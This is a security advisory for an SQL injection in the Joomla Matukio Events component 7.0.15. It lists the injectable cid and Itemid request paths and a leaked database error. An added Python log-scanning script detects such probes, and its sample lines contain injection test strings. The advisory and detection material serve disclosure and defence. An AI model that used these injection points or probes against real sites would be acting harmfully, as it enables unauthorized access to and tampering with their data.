####################################################################
# Exploit Title : Joomla Matukio Events Components 7.0.15 SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 25/02/2019
# Vendor Homepage : compojoom.com
# Software Download Link : matukio.compojoom.com
# Software Information Link : extensions.joomla.org/extension/matukio-events/
#                             compojoom.com/joomla-extensions/matukio-events-management-made-easy
# Software Version : 7.0.15 and previous versions
# Software Price : Paid Download
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
####################################################################
# Description about Software :
***************************
Matukio Events - The all-in-one events and webinar solution for Joomla:
from event management and presentation, through flexible booking forms, to payment processing.
####################################################################
# Impact :
***********
The Matukio Events component 7.0.15 [ and other versions ] for Joomla is
prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied
data before using it in an SQL query. Exploiting this issue could allow an attacker
to compromise the application, access or modify data, or exploit latent vulnerabilities
in the underlying database. A remote attacker can send a specially crafted request
to the vulnerable application and execute arbitrary SQL commands in the application's database.
Further exploitation of this vulnerability may result in unauthorized data manipulation.
An attacker can exploit this issue using a browser.
####################################################################
# SQL Injection Exploit :
**********************
/index.php?tmpl=component&option=com_matukio&view=ics&format=raw
/index.php/en/?option=com_matukio&view=ics&format=raw
/index.php?option=com_matukio&view=participantlist&cid=[SQL Injection]
/index.php?option=com_matukio&view=calendar&Itemid=[SQL Injection]
/index.php?option=com_matukio&view=participantlist&cid=[ID-NUMBER]&Itemid=[SQL Injection]
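The request paths above show that the injectable inputs are the `cid` and `Itemid` parameters of `com_matukio`, both of which should only ever carry an integer. A defender can therefore flag any request to that component whose `cid` or `Itemid` is not a plain integer, which is a far tighter rule than generic SQL-keyword matching. The script below is an added example, not part of the original advisory and not code from the Matukio project; the access-log format (Apache/nginx combined style) and the sample log lines are constructed for this example.

```python
"""Flag probes against the cid / Itemid parameters of com_matukio in web
server access logs (added detection example; log lines are constructed)."""
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample traffic in combined log format, not real requests.
SAMPLE_LOG = """\
203.0.113.10 - - [25/Feb/2019:10:00:01 +0000] "GET /index.php?option=com_matukio&view=participantlist&cid=12 HTTP/1.1" 200 5123
203.0.113.10 - - [25/Feb/2019:10:00:05 +0000] "GET /index.php?option=com_matukio&view=participantlist&cid=12' HTTP/1.1" 500 812
203.0.113.11 - - [25/Feb/2019:10:01:09 +0000] "GET /index.php?option=com_matukio&view=calendar&Itemid=101%20AND%201=1 HTTP/1.1" 200 7710
203.0.113.12 - - [25/Feb/2019:10:02:00 +0000] "GET /index.php?option=com_content&view=article&id=5 HTTP/1.1" 200 3001
"""

# ip, timestamp, method, request target and HTTP status from a combined-format line
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
INTEGER_RE = re.compile(r'^\d+$')
# Parameters the advisory names as injectable; both are numeric identifiers.
WATCHED_PARAMS = ("cid", "Itemid")


def parse_line(line):
    """Return the named fields of one log line, or None if it does not parse."""
    m = REQUEST_RE.match(line)
    return m.groupdict() if m else None


def find_suspicious(log_text):
    """Return (ip, param, decoded_value, status) for every com_matukio request
    whose cid or Itemid is not a plain integer."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        # parse_qs percent-decodes values, so encoded payloads are inspected in clear
        qs = parse_qs(urlsplit(rec["target"]).query, keep_blank_values=True)
        if qs.get("option", [""])[0] != "com_matukio":
            continue
        for param in WATCHED_PARAMS:
            for value in qs.get(param, []):
                if not INTEGER_RE.match(value):
                    hits.append((rec["ip"], param, value, int(rec["status"])))
    return hits


if __name__ == "__main__":
    for ip, param, value, status in find_suspicious(SAMPLE_LOG):
        print(f"{ip} sent non-integer {param}={value!r} to com_matukio (HTTP {status})")
```

A 500 status on such a hit is worth treating as higher priority, since the advisory's own error sample shows the database error is returned verbatim to the client; the same integer-only rule is also the server-side fix (cast the parameter to an integer before it reaches the query).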
####################################################################
# Example SQL Database Error :
****************************
#1064 You have an error in your SQL syntax; check the manual that corresponds
to your MySQL server version for the right syntax to use near 'cur.id as curid,
cur.title as curtitle, cur.sign as currencySign, cur.posi' at line 2 SQL=SELECT
a.*, r.*, cat.title AS category cur.id as curid, cur.title as curtitle, cur.sign as currencySign,
cur.position as currencyPosition, cur.decimalsign as decimalSign, cur.payment_
code as payment_code, IF(r.override_title IS NULL or r.override_title =
'', a.title, r.override_title) as title, IF(r.override_maxpupil IS NULL or r.override_maxpupil
= '', a.maxpupil, r.override_maxpupil) as maxpupil FROM #__matukio_recurring
AS r LEFT JOIN #__matukio AS a ON r.event_id = a.id LEFT JOIN
#__categories AS cat ON cat.id = a.catid LEFT JOIN #__matukio_currencies AS
cur ON cur.id = a.currency_id WHERE r.published = '1' AND r.end >
'' AND r.booked > '' AND cat.access IN (1,1) ORDER BY r.begin DESC LIMIT 0, 1000
####################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
####################################################################